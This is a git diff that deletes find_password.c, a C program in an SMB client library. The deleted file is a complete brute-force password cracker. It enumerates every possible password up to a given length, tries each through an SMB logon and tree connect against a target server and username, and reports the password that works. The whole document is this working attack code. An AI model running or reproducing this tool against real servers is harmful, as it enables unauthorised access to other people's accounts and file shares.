diff options
Diffstat (limited to 'daemon/smblib/find_password.c')
-rw-r--r-- | daemon/smblib/find_password.c | 281 |
1 files changed, 0 insertions, 281 deletions
diff --git a/daemon/smblib/find_password.c b/daemon/smblib/find_password.c deleted file mode 100644 index c444732..0000000 --- a/daemon/smblib/find_password.c +++ /dev/null @@ -1,281 +0,0 @@ -/* Find passwords ... */ -/* We do it in a brute force way ... Cycle through all the possible passwords - sending a logon to see if all it works ... We have to wait for any timeout - the the server implements before we try the next one. We could open lots - of connections to the server and then send the logon request and not wait - for the reply. This would allow us to have lots of outstanding attempts at - a time. */ - -#include <sys/types.h> -#include <unistd.h> - -#include "smblib.h" - -int verbose = FALSE; -int lotc = FALSE; - -char *SMB_Prots[] = {"PC NETWORK PROGRAM 1.0", - "MICROSOFT NETWORKS 1.03", - "MICROSOFT NETWORKS 3.0", - "LANMAN1.0", - "LM1.2X002", - "LANMAN2.1", - "NT LM 0.12", - "NT LANMAN 1.0", - NULL}; - -void usage() - -{ - fprintf(stderr,"Usage: find_password -u <user> -l <pwd-len-max> server\n"); -} - -/* figure out next password */ - -static int pwinit = FALSE, pwpos = 0; - -int next_password(char *pw, int pwlen) - -{ int i, carry = FALSE; - - if (pwinit == FALSE) { - - pwinit = TRUE; - bzero(pw, pwlen + 1); - pwpos = 0; - - } - - i = pwpos; - - while (TRUE) { - - pw[i] = pw[i] + 1; - - /* If it has wrapped around, then inc to 1 and carry up the chain */ - - if (pw[i] == 0) { - - pw[i] = 1; - i = i - 1; - - if (i < 0) { /* If we went off the end, increment pwpos */ - - pwpos = pwpos + 1; - if (pwpos >= pwlen) return(FALSE); /* No more passwords */ - - pw[pwpos] = 1; - return(TRUE); - - } - - } - else - return(TRUE); - - return(FALSE); - } -} - -static char pwd_str[1024]; /* Where we put passwords as we convert them */ - -char *print_password(char * password) - -{ int i,j; - char temp[4]; - - j = 0; - - for (i = 0; i < strlen(password); i++){ - - if (((unsigned)password[i] <= ' ') || ((unsigned)password[i] > 127)) { - - pwd_str[j] = '\\'; - sprintf(temp, "%03i", (int)password[i]); - strcpy(&pwd_str[j + 1], temp); - j = j + 3; /* Space for \ accounted for below */ - - } - else - pwd_str[j] = password[i]; - - j = j + 1; - - } - - pwd_str[j] = 0; /* Put a null on the end ... */ - - return(pwd_str); - -} - -main(int argc, char *argv[]) - -{ void *con, *tree; - extern char *optarg; - extern int optind; - int opt, error, SMB_Error, err_class, err_code, pwlen, tries = 0; - char server[80], service[80], service_name[160], password[80], username[80]; - char old_password[80], err_string[1024]; - - server[0] = 0; - strncpy(service, "IPC$", sizeof(service) - 1); - service_name[0] = 0; - username[0] = 0; - password[0] = 0; - old_password[0] = 0; - - while ((opt = getopt(argc, argv, "s:u:l:v")) != EOF) { - - switch (opt) { - case 's': - - strcpy(service, optarg); - break; - - case 'u': /* Pick up the user name */ - - strncpy(username, optarg, sizeof(username) - 1); - break; - - case 'l': /* pick up password len */ - - pwlen = atoi(optarg); - break; - - case 'v': /* Verbose? */ - verbose = TRUE; - break; - - default: - - usage(); - exit(1); - break; - } - - } - - if (optind < argc) { /* Some more parameters, assume is the server */ - strncpy(server, argv[optind], sizeof(server) - 1); - optind++; - } - else { - strcpy(server, "nemesis"); - } - - if (verbose == TRUE) { /* Print out all we know */ - - fprintf(stderr, "Finding password for User: %s, on server: %s\n", - username, server); - fprintf(stderr, "with a pwlen = %i\n", pwlen); - - } - - SMB_Init(); /* Initialize things ... */ - - /* We connect to the server and negotiate */ - - con = SMB_Connect_Server(NULL, server); - - if (con == NULL) { /* Error processing */ - - fprintf(stderr, "Unable to connect to server %s ...\n", server); - - if (SMB_Get_Last_Error() == SMBlibE_Remote) { - - SMB_Error = SMB_Get_Last_SMB_Err(); - SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error), - SMBlib_Error_Code(SMB_Error), - err_string, - sizeof(err_string) - 1); - - } - else { - SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string, sizeof(err_string) - 1); - } - - printf(" %s\n", err_string); - exit(1); - - } - - /* We need to negotiate a protocol better than PC NetWork Program */ - - if (SMB_Negotiate(con, SMB_Prots) < 0) { - - fprintf(stderr, "Unable to negotiate a protocol with server %s ...\n", - server); - - if (SMB_Get_Last_Error() == SMBlibE_Remote) { - - SMB_Error = SMB_Get_Last_SMB_Err(); - SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error), - SMBlib_Error_Code(SMB_Error), - err_string, - sizeof(err_string) - 1); - - } - else { - SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string, sizeof(err_string) - 1); - } - - printf(" %s\n", err_string); - exit(1); - - } - - sprintf(service_name, "\\\\%s\\%s", server, service); /* Could blow up */ - - /* Now loop through all password possibilities ... */ - - bzero(password, sizeof(password)); - - while (next_password(password, pwlen) == TRUE) { - - if ((tree = SMB_Logon_And_TCon(con, - NULL, - username, - password, - service_name, "?????")) == NULL) { - - if (verbose == TRUE) { /* Lets hear about the error */ - - fprintf(stderr, "Unable to logon and tree connect to server %s ...\n", - server); - fprintf(stderr, "With username: %s, and password: %s\n", - username, print_password(password)); - - if (SMB_Get_Last_Error() == SMBlibE_Remote) { - - SMB_Error = SMB_Get_Last_SMB_Err(); - SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error), - SMBlib_Error_Code(SMB_Error), - err_string, - sizeof(err_string) - 1); - - } - else { - SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string, sizeof(err_string) - 1); - } - - printf(" %s\n", err_string); - - } - } - else { /* Password match */ - - fprintf(stderr, "Logged in with password:%s\n", - print_password(password)); - - /* Exit now ... */ - - exit(0); - - } - - } - - fprintf(stderr, "Passwords exhausted."); - -} |